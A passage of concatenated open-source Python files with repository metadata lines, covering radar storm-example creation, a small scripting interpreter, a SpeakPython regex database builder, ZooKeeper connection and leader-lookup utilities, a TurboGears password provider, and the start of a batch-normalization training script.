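    list_of_operation_dicts = [
        {RADAR_FIELD_KEY: 'reflectivity_dbz',
         OPERATION_NAME_KEY: MAX_OPERATION_NAME,
         MIN_HEIGHT_KEY: 1000, MAX_HEIGHT_KEY: 3000},
        {RADAR_FIELD_KEY: 'reflectivity_dbz',
         OPERATION_NAME_KEY: MAX_OPERATION_NAME,
         MIN_HEIGHT_KEY: 3000, MAX_HEIGHT_KEY: 6000}
    ]
    return reduce_examples_3d_to_2d(
        example_dict=example_dict,
        list_of_operation_dicts=list_of_operation_dicts)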
def create_examples(
target_file_names, target_names, num_examples_per_in_file,
top_output_dir_name, radar_file_name_matrix=None,
reflectivity_file_name_matrix=None, az_shear_file_name_matrix=None,
downsampling_dict=None, target_name_for_downsampling=None,
sounding_file_names=None):
"""Creates many input examples.
If `radar_file_name_matrix is None`, both `reflectivity_file_name_matrix`
and `az_shear_file_name_matrix` must be specified.
D = number of SPC dates in time period
:param target_file_names: length-D list of paths to target files (will be
read by `read_labels_from_netcdf`).
:param target_names: See doc for `_check_target_vars`.
:param num_examples_per_in_file: Number of examples to read from each input
file.
:param top_output_dir_name: Name of top-level directory. Files will be
written here by `write_example_file`, to locations determined by
`find_example_file`.
:param radar_file_name_matrix: numpy array created by either
`find_storm_images_2d` or `find_storm_images_3d`. Length of the first
axis is D.
:param reflectivity_file_name_matrix: numpy array created by
`find_storm_images_2d3d_myrorss`. Length of the first axis is D.
:param az_shear_file_name_matrix: Same.
:param downsampling_dict: See doc for `deep_learning_utils.sample_by_class`.
If None, there will be no downsampling.
:param target_name_for_downsampling:
[used only if `downsampling_dict is not None`]
Name of target variable to use for downsampling.
:param sounding_file_names: length-D list of paths to sounding files (will
be read by `soundings.read_soundings`). If None, will not include
soundings.
"""
_check_target_vars(target_names)
num_target_vars = len(target_names)
if radar_file_name_matrix is None:
error_checking.assert_is_numpy_array(
reflectivity_file_name_matrix, num_dimensions=2)
num_file_times = reflectivity_file_name_matrix.shape[0]
these_expected_dim = numpy.array([num_file_times, 2], dtype=int)
error_checking.assert_is_numpy_array(
az_shear_file_name_matrix, exact_dimensions=these_expected_dim)
else:
error_checking.assert_is_numpy_array(radar_file_name_matrix)
num_file_dimensions = len(radar_file_name_matrix.shape)
num_file_times = radar_file_name_matrix.shape[0]
error_checking.assert_is_geq(num_file_dimensions, 2)
error_checking.assert_is_leq(num_file_dimensions, 3)
these_expected_dim = numpy.array([num_file_times], dtype=int)
error_checking.assert_is_numpy_array(
numpy.array(target_file_names), exact_dimensions=these_expected_dim
)
if sounding_file_names is not None:
error_checking.assert_is_numpy_array(
numpy.array(sounding_file_names),
exact_dimensions=these_expected_dim
)
error_checking.assert_is_integer(num_examples_per_in_file)
error_checking.assert_is_geq(num_examples_per_in_file, 1)
full_id_strings = []
storm_times_unix_sec = numpy.array([], dtype=int)
target_matrix = None
for i in range(num_file_times):
print('Reading data from: "{0:s}"...'.format(target_file_names[i]))
this_target_dict = target_val_utils.read_target_values(
netcdf_file_name=target_file_names[i], target_names=target_names)
full_id_strings += this_target_dict[target_val_utils.FULL_IDS_KEY]
storm_times_unix_sec = numpy.concatenate((
storm_times_unix_sec,
this_target_dict[target_val_utils.VALID_TIMES_KEY]
))
if target_matrix is None:
target_matrix = (
this_target_dict[target_val_utils.TARGET_MATRIX_KEY] + 0
)
else:
target_matrix = numpy.concatenate(
(target_matrix,
this_target_dict[target_val_utils.TARGET_MATRIX_KEY]),
axis=0
)
print('\n')
num_examples_found = len(full_id_strings)
num_examples_to_use = num_examples_per_in_file * num_file_times
if downsampling_dict is None:
indices_to_keep = numpy.linspace(
0, num_examples_found - 1, num=num_examples_found, dtype=int)
if num_examples_found > num_examples_to_use:
indices_to_keep = numpy.random.choice(
indices_to_keep, size=num_examples_to_use, replace=False)
else:
downsampling_index = target_names.index(target_name_for_downsampling)
indices_to_keep = dl_utils.sample_by_class(
sampling_fraction_by_class_dict=downsampling_dict,
target_name=target_name_for_downsampling,
target_values=target_matrix[:, downsampling_index],
num_examples_total=num_examples_to_use)
full_id_strings = [full_id_strings[k] for k in indices_to_keep]
storm_times_unix_sec = storm_times_unix_sec[indices_to_keep]
target_matrix = target_matrix[indices_to_keep, :]
for j in range(num_target_vars):
these_unique_classes, these_unique_counts = numpy.unique(
target_matrix[:, j], return_counts=True
)
for k in range(len(these_unique_classes)):
print((
'Number of examples with "{0:s}" in class {1:d} = {2:d}'
).format(
target_names[j], these_unique_classes[k], these_unique_counts[k]
))
print('\n')
first_spc_date_string = time_conversion.time_to_spc_date_string(
numpy.min(storm_times_unix_sec)
)
last_spc_date_string = time_conversion.time_to_spc_date_string(
numpy.max(storm_times_unix_sec)
)
spc_date_strings = time_conversion.get_spc_dates_in_range(
first_spc_date_string=first_spc_date_string,
last_spc_date_string=last_spc_date_string)
spc_date_to_out_file_dict = {}
for this_spc_date_string in spc_date_strings:
this_file_name = find_example_file(
top_directory_name=top_output_dir_name, shuffled=False,
spc_date_string=this_spc_date_string,
raise_error_if_missing=False)
if os.path.isfile(this_file_name):
os.remove(this_file_name)
spc_date_to_out_file_dict[this_spc_date_string] = this_file_name
for i in range(num_file_times):
if radar_file_name_matrix is None:
this_file_name = reflectivity_file_name_matrix[i, 0]
else:
this_file_name = numpy.ravel(radar_file_name_matrix[i, ...])[0]
this_time_unix_sec, this_spc_date_string = (
storm_images.image_file_name_to_time(this_file_name)
)
if this_time_unix_sec is None:
this_first_time_unix_sec = (
time_conversion.get_start_of_spc_date(this_spc_date_string)
)
this_last_time_unix_sec = (
time_conversion.get_end_of_spc_date(this_spc_date_string)
)
else:
this_first_time_unix_sec = this_time_unix_sec + 0
this_last_time_unix_sec = this_time_unix_sec + 0
these_indices = numpy.where(
numpy.logical_and(
storm_times_unix_sec >= this_first_time_unix_sec,
storm_times_unix_sec <= this_last_time_unix_sec)
)[0]
if len(these_indices) == 0:
continue
these_full_id_strings = [full_id_strings[m] for m in these_indices]
these_storm_times_unix_sec = storm_times_unix_sec[these_indices]
this_target_matrix = target_matrix[these_indices, :]
if sounding_file_names is None:
this_sounding_file_name = None
else:
this_sounding_file_name = sounding_file_names[i]
if radar_file_name_matrix is None:
this_example_dict = _create_2d3d_examples_myrorss(
azimuthal_shear_file_names=az_shear_file_name_matrix[
i, ...].tolist(),
reflectivity_file_names=reflectivity_file_name_matrix[
i, ...].tolist(),
full_id_strings=these_full_id_strings,
storm_times_unix_sec=these_storm_times_unix_sec,
target_matrix=this_target_matrix,
sounding_file_name=this_sounding_file_name,
sounding_field_names=None)
elif num_file_dimensions == 3:
this_example_dict = _create_3d_examples(
radar_file_name_matrix=radar_file_name_matrix[i, ...],
full_id_strings=these_full_id_strings,
storm_times_unix_sec=these_storm_times_unix_sec,
target_matrix=this_target_matrix,
sounding_file_name=this_sounding_file_name,
sounding_field_names=None)
else:
this_example_dict = _create_2d_examples(
radar_file_names=radar_file_name_matrix[i, ...].tolist(),
full_id_strings=these_full_id_strings,
storm_times_unix_sec=these_storm_times_unix_sec,
target_matrix=this_target_matrix,
sounding_file_name=this_sounding_file_name,
sounding_field_names=None)
print('\n')
if this_example_dict is None:
continue
this_example_dict.update({TARGET_NAMES_KEY: target_names})
this_output_file_name = spc_date_to_out_file_dict[this_spc_date_string]
print('Writing examples to: "{0:s}"...'.format(this_output_file_name))
write_example_file(
netcdf_file_name=this_output_file_name,
example_dict=this_example_dict,
append_to_file=os.path.isfile(this_output_file_name)
)
| thunderhoser/GewitterGefahr | gewittergefahr/deep_learning/input_examples.py | Python | mit | 103,640 |
import os
import re
import sys
import json
import shlex
import logging
import inspect
import functools
import importlib
from pprint import pformat
from collections import namedtuple
from traceback import format_tb
from requests.exceptions import RequestException
import strutil
from cachely.loader import Loader
from .lib import library, interpreter_library, DataProxy
from . import utils
from . import core
from . import exceptions
logger = logging.getLogger(__name__)
BASE_LIBS = ['snagit.lib.text', 'snagit.lib.lines', 'snagit.lib.soup']
ReType = type(re.compile(''))
class Instruction(namedtuple('Instruction', 'cmd args kws line lineno')):
'''
``Instruction``'s take the form::
command [arg [arg ...]] [key=arg [key=arg ...]]
Where ``arg`` can be one of: single quoted string, double quoted string,
digit, True, False, None, or a simple, unquoted string.
'''
values_pat = r'''
[rj]?'(?:(\'|[^'])*?)' |
[r]?"(?:(\"|[^"])*?)" |
(\d+) |
(True|False|None) |
([^\s,]+)
'''
args_re = re.compile(
r'''^(
(?P<kwd>\w[\w\d-]*)=(?P<val>{0}) |
(?P<arg>{0}|([\s,]+))
)\s*'''.format(values_pat),
re.VERBOSE
)
value_dict = {'True': True, 'False': False, 'None': None}
def __str__(self):
def _repr(w):
if isinstance(w, ReType):
return 'r"{}"'.format(str(w.pattern))
return repr(w)
return '{}{}{}'.format(
self.cmd.upper(),
' {}'.format(
' '.join([_repr(c) for c in self.args]) if self.args else ''
),
' {}'.format(' '.join(
'{}={}'.format(k, _repr(v)) for k, v in self.kws.items()
) if self.kws else '')
)
@classmethod
def get_value(cls, s):
if s.isdigit():
return int(s)
elif s in cls.value_dict:
return cls.value_dict[s]
elif s.startswith(('r"', "r'")):
return re.compile(utils.escaped(s[2:-1]))
elif s.startswith("j'"):
return json.loads(utils.escaped(s[2:-1]))
elif s.startswith(('"', "'")):
return utils.escaped(s[1:-1])
else:
return s.strip()
@classmethod
def parse(cls, line, lineno):
args = []
kws = {}
cmd, text = strutil.splitter(line, expected=2, strip=True)
cmd = cmd.lower()
while text:
m = cls.args_re.search(text)
if not m:
break
gdict = m.groupdict()
kwd = gdict.get('kwd')
if kwd:
kws[kwd] = cls.get_value(gdict.get('val', ''))
else:
arg = gdict.get('arg', '').strip()
if arg != ',':
args.append(cls.get_value(arg))
text = text[len(m.group()):]
if text:
raise SyntaxError(
'Syntax error: "{}" (line {})'.format(text, lineno)
)
return cls(cmd, args, kws, line, lineno)
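# Usage sketch (illustrative only): parse one line of the grammar described in
# the Instruction docstring.  The command name "fetch" is a placeholder; any
# word is accepted as a command name.
def _demo_instruction_parse():
    instr = Instruction.parse("fetch 'http://example.com' retries=3 verbose=True", 1)
    # Expected (roughly): instr.cmd == 'fetch',
    # instr.args == ['http://example.com'],
    # instr.kws == {'retries': 3, 'verbose': True}
    return instr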
def lexer(code, lineno=0):
'''
Takes the script source code, scans it, and lexes it into
``Instructions``
'''
for chars in code.splitlines():
lineno += 1
line = chars.rstrip()
if not line or line.lstrip().startswith('#'):
continue
logger.debug('Lexed {} byte(s) line {}'.format(len(line), chars))
yield Instruction.parse(line, lineno)
def load_libraries(extensions=None):
if isinstance(extensions, str):
extensions = [extensions]
libs = BASE_LIBS + (extensions or [])
for lib in libs:
importlib.import_module(lib)
class Interpreter:
def __init__(
self,
contents=None,
loader=None,
use_cache=False,
do_pm=False,
extensions=None
):
self.use_cache = use_cache
self.loader = loader if loader else Loader(use_cache=use_cache)
self.contents = Contents(contents)
self.do_debug = False
self.do_pm = do_pm
self.instructions = []
load_libraries(extensions)
def load_sources(self, sources, use_cache=None):
use_cache = self.use_cache if use_cache is None else bool(use_cache)
contents = self.loader.load_sources(sources)
self.contents.update([
ct.decode() if isinstance(ct, bytes) else ct for ct in contents
])
def listing(self, linenos=False):
items = []
for instr in self.instructions:
items.append('{}{}'.format(
'{} '.format(instr.lineno) if linenos else '',
instr.line
))
return items
def lex(self, code):
lineno = self.instructions[-1].lineno if self.instructions else 0
instructions = list(lexer(code, lineno))
self.instructions.extend(instructions)
return instructions
def execute(self, code):
for instr in self.lex(code):
try:
self._execute_instruction(instr)
except exceptions.ProgramWarning as why:
print(why)
return self.contents
def _load_handler(self, instr):
if instr.cmd in library.registry:
func = library.registry[instr.cmd]
return self.contents, (func, instr.args, instr.kws)
elif instr.cmd in interpreter_library.registry:
func = interpreter_library.registry[instr.cmd]
return func, (self, instr.args, instr.kws)
raise exceptions.ProgramWarning(
'Unknown instruction (line {}): {}'.format(instr.lineno, instr.cmd)
)
def _execute_instruction(self, instr):
logger.debug('Executing {}'.format(instr.cmd))
handler, args = self._load_handler(instr)
do_debug, self.do_debug = self.do_debug, False
if do_debug:
utils.pdb.set_trace()
try:
handler(*args)
except Exception:
exc, value, tb = sys.exc_info()
if self.do_pm:
logger.error(
'Script exception, line {}: {} (Entering post_mortem)'.format( # noqa
instr.lineno,
value
)
)
utils.pdb.post_mortem(tb)
else:
raise
def execute_script(filename, contents=''):
code = utils.read_file(filename)
return execute_code(code, contents)
def execute_code(code, contents=''):
intrep = Interpreter(contents)
return str(intrep.execute(code))
class Contents:
def __init__(self, contents=None):
self.stack = []
self.set_contents(contents)
def __iter__(self):
return iter(self.contents)
def __len__(self):
return len(self.contents)
def __str__(self):
return '\n'.join(str(c) for c in self)
# def __getitem__(self, index):
# return self.contents[index]
def pop(self):
if self.stack:
self.contents = self.stack.pop()
def __call__(self, func, args, kws):
contents = []
for data in self:
result = func(data, args, kws)
contents.append(result)
self.update(contents)
def merge(self):
if self.contents:
first = self.contents[0]
data = first.merge(self.contents)
self.update([data])
def update(self, contents):
if self.contents:
self.stack.append(self.contents)
self.set_contents(contents)
def set_contents(self, contents):
self.contents = []
if isinstance(contents, (str, bytes)):
contents = [contents]
contents = contents or []
for ct in contents:
if isinstance(ct, (str, bytes)):
ct = DataProxy(ct)
self.contents.append(ct)
| dakrauth/snarf | snagit/core.py | Python | mit | 7,965 |
import antlr3;
import sqlite3;
import pickle;
import sys, os;
import re;
from SpeakPython.SpeakPython import SpeakPython;
from SpeakPython.SpeakPythonLexer import SpeakPythonLexer;
from SpeakPython.SpeakPythonParser import SpeakPythonParser;
#sort results based on length of labels
def sortResults(results):
l = len(results);
if l == 1 or l == 0:
return results;
s1 = sortResults(results[:l/2]);
s2 = sortResults(results[l/2:]);
res = [];
si1 = 0;
si2 = 0;
sl1 = len(s1);
sl2 = len(s2);
max = sl1 + sl2;
for i in range(0, max):
if si1 == sl1:
res.extend(s2[si2:]);
break;
if si2 == sl2:
res.extend(s1[si1:]);
break;
if len(s1[si1].labels) > len(s2[si2].labels):
res.append( s1[si1] );
si1 += 1;
else:
res.append( s2[si2] );
si2 += 1;
return res;
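#Usage sketch (illustrative only): sortResults orders result objects by how
#many labels they carry, most labels first.  _FakeResult stands in for the
#real SpeakPython result type.
def demoSortResults():
	class _FakeResult(object):
		def __init__(self, labels):
			self.labels = labels;
	ordered = sortResults([_FakeResult(['a']), _FakeResult(['a', 'b', 'c'])]);
	return [len(r.labels) for r in ordered]; #[3, 1]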
def makeDB(conn):
c = conn.cursor();
try:
c.execute("DROP TABLE matches");
c.execute("DROP TABLE functions");
c.execute("DROP TABLE kleene")
conn.commit();
except Exception as e:
conn.rollback();
c.execute("CREATE TABLE matches (order_id INTEGER PRIMARY KEY, keywords TEXT, regex TEXT, results BLOB)");
c.execute("CREATE TABLE functions (name TEXT, regex TEXT, results BLOB)");
c.execute("CREATE TABLE kleene (id TEXT PRIMARY KEY, regexes BLOB)");
#index the keywords to speed up text search
c.execute("CREATE INDEX IF NOT EXISTS keyword_idx ON matches (keywords)");
c.execute("CREATE INDEX IF NOT EXISTS func_name_idx ON functions (name)");
conn.commit();
def performTestCases(exp, testCases):
print "Testing: ", exp
for t in testCases:
m = re.match(exp, t);
if m == None:
print "Test case failed: ", t;
return False;
return True;
def insertIntoDB(conn, matches, functions):
matchEntries = [];
kleeneEntries = [];
funcEntries = [];
print "Running test cases for matches...";
idCount = 0;
for m in matches:
#perform in-suite test cases
succeededTests = performTestCases(m.exp, m.testCases);
if not succeededTests:
return;
k = ','.join(m.keywords);
m.results = sortResults(m.results);
if len(m.kGroupRegexes) > 0:
kleeneEntries.append((str(idCount), pickle.dumps(m.kGroupRegexes)));
matchEntries.append((idCount, k, m.exp, pickle.dumps(m.results)));
idCount += 1;
print "All match test cases passed.";
c = conn.cursor();
c.executemany("INSERT INTO matches VALUES (?,?,?,?)", matchEntries);
conn.commit();
print "Running test cases for functions...";
for f in functions:
f = functions[f];
#perform in-suite test cases
		succeededTests = performTestCases(f.getExp(), f.testCases);
if not succeededTests:
return;
#save all regex groups in database under function name
if len(f.kGroupRegexes) > 0:
kleeneEntries.append((f.getName(), pickle.dumps(f.kGroupRegexes)));
f.results = sortResults(f.results);
funcEntries.append((f.getName(), f.getExp(), pickle.dumps(f.getResults())));
print "All function test cases passed";
c.executemany("INSERT INTO functions VALUES (?,?,?)", funcEntries);
c.executemany("INSERT INTO kleene VALUES (?,?)", kleeneEntries);
conn.commit();
print "Functions:";
for row in c.execute("SELECT * FROM functions"):
print row, '\n';
print "\n";
print "Matches:";
for row in c.execute("SELECT * FROM matches"):
print row, '\n';
print "\n";
print "Kleene:";
for row in c.execute("SELECT * FROM kleene"):
print row, '\n';
print "\n";
conn.close();
def parse(conn, fileList, dirName):
parser = None;
otherGlobalTests = {};
for f in fileList:
#join filename with current directory path
fileName = os.path.join(dirName, f);
#if f is a file, parse and insert into db
if os.path.isfile(fileName):
char_stream = antlr3.ANTLRFileStream(fileName);
lexer = SpeakPythonLexer(char_stream);
tokens = antlr3.CommonTokenStream(lexer);
# for t in lexer:
# print t;
parser = SpeakPythonParser(tokens);
parser.prog();
insertIntoDB(conn, parser.matches, parser.aliases);
#if f is a dir, pass list of files into recursive call
if os.path.isdir(fileName):
subFiles = os.listdir(fileName);
otherGlobalTests = parse(conn, subFiles, fileName);
globalTests = {};
if parser == None:
print "Parser not defined."
else:
globalTests = parser.globalTests;
globalTests.update(otherGlobalTests);
return globalTests;
def main(argv):
name = argv[1] + '.db';
conn = sqlite3.connect(name);
makeDB(conn);
globalTests = parse(conn, [argv[2]], '');
for gt in globalTests:
sp = SpeakPython(name);
r = sp.matchResult(gt);
resultStr = '';
if r != None:
resultStr = r.getResult();
if resultStr != globalTests[gt]:
print "Value test case failed: (" + gt + ") does not return (" + globalTests[gt] + "), but instead returns (" + resultStr + ")";
main(sys.argv);
| netgio/voicecount | devicecode/SpeakPythonMakeDB.py | Python | mit | 4,765 |
from __future__ import unicode_literals
from __future__ import print_function
import socket
import time
import six
import math
import threading
from random import choice
import logging
from kazoo.client import KazooClient
from kazoo.client import KazooState
from kazoo.protocol.states import EventType
from kazoo.handlers.threading import KazooTimeoutError
from kazoo.exceptions import OperationTimeoutError
log = logging.getLogger(__name__)
MODE_LEADER = 'leader'
CONNECTION_CACHE_ENABLED = True
CONNECTION_CACHE = {}
def kazoo_client_cache_enable(enable):
"""
    Enable or disable the connection cache.
    The connection cache reuses a connection object whenever the same connection
    parameters are seen again.  Because parts of this program are designed to be
    independent and uncoupled, each part needs to establish its own connections.
    Connecting to Zookeeper is the most time-consuming part of most interactions,
    so caching connections makes tests, health checks, etc. run much faster.
"""
global CONNECTION_CACHE_ENABLED
CONNECTION_CACHE_ENABLED = enable
def kazoo_client_cache_serialize_args(kwargs):
'''
Returns a hashable object from keyword arguments dictionary.
This hashable object can be used as the key in another dictionary.
:param kwargs: a dictionary of connection parameters passed to KazooClient
Supported connection parameters::
hosts - Comma-separated list of hosts to connect to (e.g. 127.0.0.1:2181,127.0.0.1:2182,[::1]:2183).
timeout - The longest to wait for a Zookeeper connection.
client_id - A Zookeeper client id, used when re-establishing a prior session connection.
handler - An instance of a class implementing the IHandler interface for callback handling.
default_acl - A default ACL used on node creation.
auth_data - A list of authentication credentials to use for the connection.
Should be a list of (scheme, credential) tuples as add_auth() takes.
read_only - Allow connections to read only servers.
randomize_hosts - By default randomize host selection.
connection_retry - A kazoo.retry.KazooRetry object to use for retrying the connection to
Zookeeper. Also can be a dict of options which will be used for creating one.
command_retry - A kazoo.retry.KazooRetry object to use for the KazooClient.retry() method.
Also can be a dict of options which will be used for creating one.
logger - A custom logger to use instead of the module global log instance.
'''
return frozenset(kwargs.items())
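# Usage sketch (illustrative only): identical keyword arguments serialize to
# the same hashable key, which is what lets kazoo_client_cache_get() /
# kazoo_client_cache_put() reuse an existing connection.
def _demo_cache_key():
    key_a = kazoo_client_cache_serialize_args({'hosts': '127.0.0.1:2181/solr'})
    key_b = kazoo_client_cache_serialize_args({'hosts': '127.0.0.1:2181/solr'})
    return key_a == key_b  # True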
def kazoo_client_cache_get(kwargs):
if CONNECTION_CACHE_ENABLED:
return CONNECTION_CACHE.get(kazoo_client_cache_serialize_args(kwargs))
def kazoo_client_cache_put(kwargs, client):
global CONNECTION_CACHE
CONNECTION_CACHE[kazoo_client_cache_serialize_args(kwargs)] = client
def kazoo_clients_connect(clients, timeout=5, continue_on_error=False):
"""
    Connect the provided Zookeeper clients asynchronously.
    This is the fastest way to connect multiple clients while respecting a timeout.
    :param clients: a sequence of KazooClient objects (or subclasses thereof).
    :param timeout: connection timeout in seconds
    :param continue_on_error: don't raise an exception if only some of the hosts
        were able to connect
"""
asyncs = []
for client in clients:
# returns immediately
asyncs.append(client.start_async())
tstart = time.time()
while True:
elapsed = time.time() - tstart
remaining = math.ceil(max(0, timeout - elapsed))
        # "async" is a reserved word in Python 3.7+, so use a neutral name here.
        connecting = [obj for idx, obj in enumerate(asyncs) if not clients[idx].connected]
connected_ct = len(clients) - len(connecting)
if not connecting:
# successful - all hosts connected
return connected_ct
if not remaining:
# stop connection attempt for any client that timed out.
for client in clients:
if client.connected:
continue
else:
client.stop()
if len(connecting) < len(clients):
# if some of the clients connected, return the ones that are connected
msg = 'Connection Timeout - %d of %d clients timed out after %d seconds' % (
len(connecting),
len(clients),
timeout
)
if continue_on_error:
log.warn(msg)
return connected_ct
else:
                    raise OperationTimeoutError(msg)
raise OperationTimeoutError('All hosts timed out after %d secs' % timeout)
# Wait the remaining amount of time to connect
# note that this will wait UP TO remaining, but will only wait as long as it takes
# to connect.
connecting[0].wait(remaining)
def kazoo_clients_from_client(kazoo_client):
"""
Construct a series of KazooClient connection objects from a single KazooClient instance
    A client is constructed per host within the KazooClient, so if the KazooClient was
    constructed with 3 hosts in its connection string, 3 KazooClient instances will be returned.
    The constructed clients have the same type as `kazoo_client`, so this method also works
    with mocked connection objects or customized subclasses of KazooClient.
"""
# TODO support all connection arguments
connection_strings = zk_conns_from_client(kazoo_client)
cls = kazoo_client.__class__
clients = []
for conn_str in connection_strings:
args = {'hosts': conn_str}
client = kazoo_client_cache_get(args)
if not client:
client = cls(**args)
kazoo_client_cache_put(args, client)
clients.append(client)
return clients
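# Usage sketch (illustrative only): expand a three-host connection string into
# one client per host and connect them all with a shared five-second timeout.
# The host names are placeholders.
def _demo_per_host_clients():
    seed_client = KazooClient(hosts='zk1:2181,zk2:2181,zk3:2181/solr')
    clients = kazoo_clients_from_client(seed_client)
    connected_count = kazoo_clients_connect(clients, timeout=5, continue_on_error=True)
    return clients, connected_count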
def get_leader(zk_hosts):
# TODO refactor me to accept KazooClient object.
for host in zk_hosts:
zk = KazooClient(hosts=host, read_only=True)
try:
zk.start()
except KazooTimeoutError as e:
print('ZK Timeout host: [%s], %s' % (host, e))
continue
properties_str = zk.command(cmd=b'srvr')
properties = properties_str.split('\n')
for line in properties:
if not line.strip().lower().startswith('mode:'):
continue
key, val = line.split(':')
if val.strip().lower() == MODE_LEADER:
return host
zk.stop()
raise RuntimeError('no leader available, from connections given')
def get_server_by_id(zk_hosts, server_id):
# TODO refactor me to accept KazooClient object.
if not isinstance(server_id, int):
raise ValueError('server_id must be int, got: %s' % type(server_id))
for host in zk_hosts:
zk = KazooClient(hosts=host, read_only=True)
try:
zk.start()
except KazooTimeoutError as e:
print('ZK Timeout host: [%s], %s' % (host, e))
continue
properties_str = zk.command(cmd=b'conf')
properties = properties_str.split('\n')
for line in properties:
if not line.strip().lower().startswith('serverid='):
continue
key, val = line.split('=')
val = int(val)
if val == server_id:
return host
continue
zk.stop()
raise ValueError("no host available with that server id [%d], from connections given" % server_id)
def zk_conn_from_client(kazoo_client):
"""
Make a Zookeeper connection string from a KazooClient instance
"""
hosts = kazoo_client.hosts
chroot = kazoo_client.chroot
return zk_conn_from_hosts(hosts, chroot)
def zk_conns_from_client(kazoo_client):
"""
Make a Zookeeper connection string per-host from a KazooClient instance
"""
hosts = kazoo_client.hosts
chroot = kazoo_client.chroot
return zk_conns_from_hosts(hosts, chroot)
def zk_conn_from_hosts(hosts, chroot=None):
"""
Make a Zookeeper connection string from a list of (host,port) tuples.
"""
if chroot and not chroot.startswith('/'):
chroot = '/' + chroot
    return ','.join(['%s:%s' % (host, port) for host, port in hosts]) + (chroot or '')
def zk_conns_from_hosts(hosts, chroot=None):
"""
    Make a list of Zookeeper connection strings, one per host.
"""
if chroot and not chroot.startswith('/'):
chroot = '/' + chroot
    return ['%s:%s' % (host, port) + (chroot or '') for host, port in hosts]
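# Usage sketch for the connection-string builders above (doctest-style comments,
# nothing executes on import; hosts are (host, port) tuples as exposed by
# KazooClient.hosts):
#   >>> zk_conn_from_hosts([('zk1', 2181), ('zk2', 2181)], chroot='app')
#   'zk1:2181,zk2:2181/app'
#   >>> zk_conns_from_hosts([('zk1', 2181), ('zk2', 2181)])
#   ['zk1:2181', 'zk2:2181']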
def parse_zk_conn(zookeepers):
"""
Parse Zookeeper connection string into a list of fully qualified connection strings.
"""
    zk_hosts, root = zookeepers.split('/', 1) if '/' in zookeepers else (zookeepers, None)
zk_hosts = zk_hosts.split(',')
root = '/'+root if root else ''
all_hosts_list = [h+root for h in zk_hosts]
return all_hosts_list
def parse_zk_hosts(zookeepers, all_hosts=False, leader=False, server_id=None):
"""
Returns [host1, host2, host3]
    Default behavior is to return a single host from the list, chosen at random (a list of 1).
    :param all_hosts: if True, all hosts will be returned in a list
:param leader: if true, return the ensemble leader host
:param server_id: if provided, return the host with this server id (integer)
"""
    zk_hosts, root = zookeepers.split('/', 1) if '/' in zookeepers else (zookeepers, None)
zk_hosts = zk_hosts.split(',')
root = '/'+root if root else ''
all_hosts_list = [h+root for h in zk_hosts]
if leader:
zk_hosts = [get_leader(zk_hosts)]
elif server_id:
zk_hosts = [get_server_by_id(zk_hosts, server_id)]
# make a list of each host individually, so they can be queried one by one for statistics.
elif all_hosts:
zk_hosts = all_hosts_list
# otherwise pick a single host to query by random.
else:
zk_hosts = [choice(zk_hosts) + root]
return zk_hosts
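# Usage sketch for the parsers above (doctest-style comments; pure string
# manipulation, no ZooKeeper connection is made when all_hosts=True):
#   >>> parse_zk_conn('zk1:2181,zk2:2181/app')
#   ['zk1:2181/app', 'zk2:2181/app']
#   >>> parse_zk_hosts('zk1:2181,zk2:2181/app', all_hosts=True)
#   ['zk1:2181/app', 'zk2:2181/app']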
def text_type(string, encoding='utf-8'):
"""
Given text, or bytes as input, return text in both python 2/3
This is needed because the arguments to six.binary_type and six.text_type change based on
if you are passing it text or bytes, and if you simply pass bytes to
six.text_type without an encoding you will get output like: ``six.text_type(b'hello-world')``
which is not desirable.
"""
if isinstance(string, six.text_type):
return six.text_type(string)
else:
return six.text_type(string, encoding)
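# Example (doctest-style): both bytes and text input normalize to text on
# Python 2 and 3:
#   >>> text_type(b'hello') == text_type(u'hello') == u'hello'
#   True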
netcat_lock = threading.Lock()
def netcat(hostname, port, content, timeout=5):
"""
    Operates similarly to the netcat (nc) command in Linux.
    Thread-safe implementation.
"""
    # send the request; encode text to bytes first (six.binary_type(text) would
    # need an explicit encoding on Python 3)
    if isinstance(content, six.text_type):
        content = content.encode('utf-8')
try:
with netcat_lock:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(timeout)
            sock.connect((hostname, int(port)))
sock.sendall(content)
except socket.timeout as e:
raise IOError("connect timeout: %s calling [%s] on [%s]" % (e, content, hostname))
except socket.error as e: # subclass of IOError
raise IOError("connect error: %s calling [%s] on [%s]" % (e, content, hostname))
response = ''
started = time.time()
while True:
if time.time() - started >= timeout:
raise IOError("timed out retrieving data from: %s" % hostname)
# receive the response
try:
# blocks until there is data on the socket
with netcat_lock:
msg = sock.recv(1024)
response += text_type(msg)
except socket.timeout as e:
raise IOError("%s calling [%s] on [%s]" % (e, content, hostname))
except socket.error as e:
raise IOError("%s calling [%s] on [%s]" % (e, content, hostname))
if len(msg) == 0:
try:
with netcat_lock:
sock.shutdown(socket.SHUT_RDWR)
sock.close()
except OSError:
pass
finally:
break
response = text_type(response)
return response
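# Hedged usage sketch (hypothetical hostname; requires a reachable ZooKeeper
# node). ZooKeeper answers the 'ruok' four-letter word with 'imok' when healthy:
#   response = netcat('zk1.example.com', 2181, b'ruok')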
| bendemott/solr-zkutil | solrzkutil/util.py | Python | mit | 13,103 |
from turbogears.identity.soprovider import *
from secpwhash import check_password
class SoSecPWHashIdentityProvider(SqlObjectIdentityProvider):
def validate_password(self, user, user_name, password):
# print >>sys.stderr, user, user.password, user_name, password
return check_password(user.password,password)
| edwardsnj/rmidb2 | rmidb2/sosecpwhashprovider.py | Python | mit | 317 |
#!/usr/bin/env python
from __future__ import print_function
"""
Batch Normalization + SVRG on CIFAR-10
Independent Study
May 24, 2016
Yintai Ma
"""
"""
# Use SGD AdaGrad instead
"""
"""
under folder of batch_normalization
Before merge; number 1
have options for "mlp", "mlpbn"; "sgd" and "custom_svrg2" and "sgd_adagrad"
"""
import sys
import os
import time
import matplotlib
import matplotlib.pyplot as plt
# parameters for Linux
plt.switch_backend('agg')
import pylab
#THEANO_FLAGS='floatX=float32,device=gpu0,mode=FAST_RUN'
import numpy as np
import theano
import theano.tensor as T
import lasagne
import pickle
import gzip
import my_bn_layer # Define DBN, e.g., DBN1
import my_bn_layer2 # Define DBN2, e.g. ,1/m^2 MA
import my_bn_layer_const # Define for const alpha (actually we can just use the my_bn_layer)
# import my_bn_layer_5_10_m # Define DBN2, e.g. ,5/10+m MA
from collections import OrderedDict
# May 18, 2016, Yintai Ma
# standard setting , epoch = 500, batch size = 100
OUTPUT_FIGURE_PATH = 'data_large/'
OUTPUT_DATA_PATH = 'data_large/'
NUM_EPOCHS = 20
BATCH_SIZE = 100
NUM_HIDDEN_UNITS = 500
